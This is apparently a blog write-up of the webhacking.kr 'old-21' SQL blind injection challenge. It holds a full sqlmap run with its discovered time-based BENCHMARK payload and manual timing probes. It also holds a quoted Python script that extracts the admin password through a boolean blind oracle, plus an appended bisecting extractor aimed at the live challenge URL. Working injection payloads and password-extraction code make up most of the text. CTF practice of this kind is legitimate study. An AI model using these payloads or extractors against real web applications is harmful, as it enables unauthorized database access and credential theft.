sqlmap
About Hacking kr old21
Since the challenge says "SQL Blind Injection", I look into SQL injection.
I tried entering several likely candidate inputs, but it was difficult...
So I try using sqlmap.
$ sqlmap -u "https://webhacking.kr/challenge/bonus-1/index.php?id=admin&pw=password" --level 2 --risk 3 --dbms mysql
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.8.8#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:58 /2024-08-16/

[07:56:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=npe4dc0muie...drovtqdqoe'). Do you want to use those [Y/n] Y
[07:57:01] [INFO] testing if the target URL content is stable
[07:57:01] [INFO] target URL content is stable
[07:57:01] [INFO] testing if GET parameter 'id' is dynamic
[07:57:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[07:57:01] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[07:57:01] [INFO] testing for SQL injection on GET parameter 'id'
[07:57:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:57:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[07:57:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[07:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[07:57:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[07:57:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[07:57:09] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:57:09] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[07:57:09] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[07:57:09] [INFO] testing 'Generic inline queries'
[07:57:09] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[07:57:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[07:57:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:57:12] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:57:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:57:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:57:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:57:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:57:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:57:15] [INFO] testing 'MySQL inline queries'
[07:57:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:57:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:57:17] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[07:57:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[07:57:19] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[07:57:19] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[07:57:27] [INFO] GET parameter 'id' appears to be 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) value? [Y/n] Y
[07:57:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:57:49] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[07:57:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[07:57:53] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[07:57:54] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 355 HTTP(s) requests:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: id=admin' AND 9708=BENCHMARK(5000000,MD5(0x6a787555)) AND 'ZxXn'='ZxXn&pw=password
---
[07:58:26] [INFO] the back-end DBMS is MySQL
[07:58:26] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web application technology: PHP, Apache
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[07:59:51] [INFO] fetched data logged to text files under '/Users/xxxxxxxx/.local/share/sqlmap/output/webhacking.kr'

[*] ending @ 07:59:51 /2024-08-16/
Putting the following value into the id parameter, I found that the response takes a long time.
id=admin' AND 9708=BENCHMARK(3000000,MD5(0x6a787555)) AND 'ZxXn'='ZxXn&pw=password
After that, I try trimming the parameters.
id=admin' AND 9708=BENCHMARK(3000000,MD5(0x6a787555)) AND 'ZxXn'='ZxXn
Now I go and check the number of characters in the password, starting with how many characters or more it has.
id=admin' AND IF( 1=1 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> took 3 seconds or more
id=admin' AND IF( 1=2 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> returned immediately
This confirms that the SQL sandwiched between the two ANDs is being evaluated.
Next, I check the length of a string.
id=admin' AND IF( LENGTH('aaa')=3 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> took 3 seconds or more
id=admin' AND IF( LENGTH('aaaa')=3 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> returned immediately
id=admin' AND IF( LENGTH(id)>0 , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
id=admin' AND IF( length(pw)='%5%' , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> false
id=admin' AND IF( length(pw)like(36) , 9708=BENCHMARK(3000000,MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn
-> false
I gave up at this point.
Answer
On an overseas site, someone had posted the following answer.
https://ethical-hack.tistory.com/23
docker run --rm -v .:/app -w /app python:3-slim bash -c "pip install requests && python main.py"
They key the blind injection on a different trigger (not time-based).
import requests

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117'}
cookies = {'PHPSESSID': 'YOUR SESSION ID VALUE'}  # the logged-in webhacking.kr session

def HttpRequest():
    str_len = 0
    password = ""
    # Step 1: password length. The injected id keeps the admin row only when
    # length(pw) matches i; the page then says "wrong password" because pw=1 is wrong.
    for i in range(50):
        url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin' and if(length(pw)like({}),1,0) or '1'='0&pw=1".format(i)
        res = requests.get(url, headers=headers, cookies=cookies)
        if res.text.find('wrong password') > 0:
            str_len = i
    # Step 2: one position at a time, try every ASCII code from 48 to 127
    # and keep the first one for which the page again says "wrong password".
    for i in range(1, str_len + 1):
        for j in range(48, 128):
            url = "https://webhacking.kr/challenge/bonus-1/index.php?id=admin' and if(ord(substr(pw,{},1))like({}),1,0) or '1'='0&pw=1".format(i, j)
            res = requests.get(url, headers=headers, cookies=cookies)
            if res.text.find('wrong password') > 0:
                password += chr(j)
                break
    print("Password Length: {}".format(str_len))
    print("Password: {}".format(password))

if __name__ == '__main__':
    HttpRequest()
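The manual BENCHMARK probes above and the tistory script's "wrong password" check are the same thing seen from two sides: each request is a True/False oracle for one SQL condition, so one extractor can drive either. The block below is an added example, not code from this page or from the tistory post. It keeps both payload shapes from the page but asks "length(pw)>N" and "ord(substr(pw,i,1))>N" and bisects, which costs 7 requests per character instead of up to 80 in the linear scan. Two points that explain the failed probes above: "%" is only a wildcard inside LIKE, so length(pw)='%5%' compares the length with the string '%5%' (MySQL casts it to 0) and can only be true for an empty password, which is why the tistory script writes length(pw)like(N); and 9708=BENCHMARK(...) is always false because BENCHMARK returns 0, so the timing payload never changes the page content and the IF can only be read from the response time. TARGET and the payload text come from the page; the PHPSESSID argument, DELAY_THRESHOLD, simulated_oracle and the secret "s3cr3t-Pw" are assumptions or constructed so the block runs offline.

```python
import re
import time
import urllib.parse
import urllib.request

# Target and payload skeletons are taken from the page; everything else is this example's own.
TARGET = "https://webhacking.kr/challenge/bonus-1/index.php"
BENCHMARK_ITERATIONS = 3000000  # the count used by hand on the page
DELAY_THRESHOLD = 1.5           # seconds; assumption, between "immediately" and "3 seconds or more"


def time_based_payload(cond):
    """id value in the page's BENCHMARK form: the query stalls only when cond is true.
    9708=BENCHMARK(...) is always false (BENCHMARK returns 0), so the page content never
    changes; only the response time carries information."""
    return ("admin' AND IF({}, 9708=BENCHMARK({},MD5(0x6a787555)), 1=1) AND 'ZxXn'='ZxXn"
            .format(cond, BENCHMARK_ITERATIONS))


def boolean_payload(cond):
    """id value in the tistory script's form: the WHERE clause keeps the admin row only
    when cond is true, so with pw=1 the page answers 'wrong password' exactly when cond holds."""
    return "admin' and if({},1,0) or '1'='0".format(cond)


def http_oracle(session_id, mode="boolean"):
    """Real oracle: True when cond holds on the server. Needs a logged-in PHPSESSID (assumed)."""
    def oracle(cond):
        payload = boolean_payload(cond) if mode == "boolean" else time_based_payload(cond)
        url = TARGET + "?" + urllib.parse.urlencode({"id": payload, "pw": "1"})
        req = urllib.request.Request(url, headers={"Cookie": "PHPSESSID=" + session_id})
        start = time.perf_counter()
        with urllib.request.urlopen(req, timeout=30) as resp:
            body = resp.read()
        if mode == "boolean":
            return b"wrong password" in body
        return time.perf_counter() - start > DELAY_THRESHOLD
    return oracle


def simulated_oracle(secret):
    """Offline stand-in for the server so this example runs without the target. It evaluates
    the only two condition shapes the extractor emits against a constructed secret."""
    def oracle(cond):
        m = re.fullmatch(r"length\(pw\)>(\d+)", cond)
        if m:
            return len(secret) > int(m.group(1))
        m = re.fullmatch(r"ord\(substr\(pw,(\d+),1\)\)>(\d+)", cond)
        if m:
            pos, value = int(m.group(1)), int(m.group(2))
            return ord(secret[pos - 1]) > value   # substr() positions are 1-based
        raise ValueError("unsupported condition: " + cond)
    return oracle


def _bisect(oracle, template, lo, hi):
    """Hidden integer in [lo, hi]: each probe asks 'value > mid' via template.format(mid),
    so the search needs at most ceil(log2(hi - lo + 1)) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(template.format(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(oracle, max_len=64):
    """Recover the admin password through any True/False oracle; returns (password, request_count)."""
    count = [0]

    def counted(cond):
        count[0] += 1
        return oracle(cond)

    length = _bisect(counted, "length(pw)>{}", 0, max_len)
    chars = [chr(_bisect(counted, "ord(substr(pw,%d,1))>{}" % pos, 0, 127))
             for pos in range(1, length + 1)]
    return "".join(chars), count[0]


if __name__ == "__main__":
    # Constructed secret for the offline run; swap simulated_oracle(...) for
    # http_oracle("<PHPSESSID>") or http_oracle("<PHPSESSID>", mode="time") against the real challenge.
    pw, n = extract_password(simulated_oracle("s3cr3t-Pw"))
    print("recovered {!r} with {} requests".format(pw, n))
```

With mode="time" the only thing that changes is how the oracle reads the answer, so the same length and character logic applies to the page's manual procedure; the timing threshold is the fragile part, and sqlmap's warning above about not stressing the connection applies here just as much.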
page:https://minegishirei.hatenablog.com/entry/2024/08/17/110244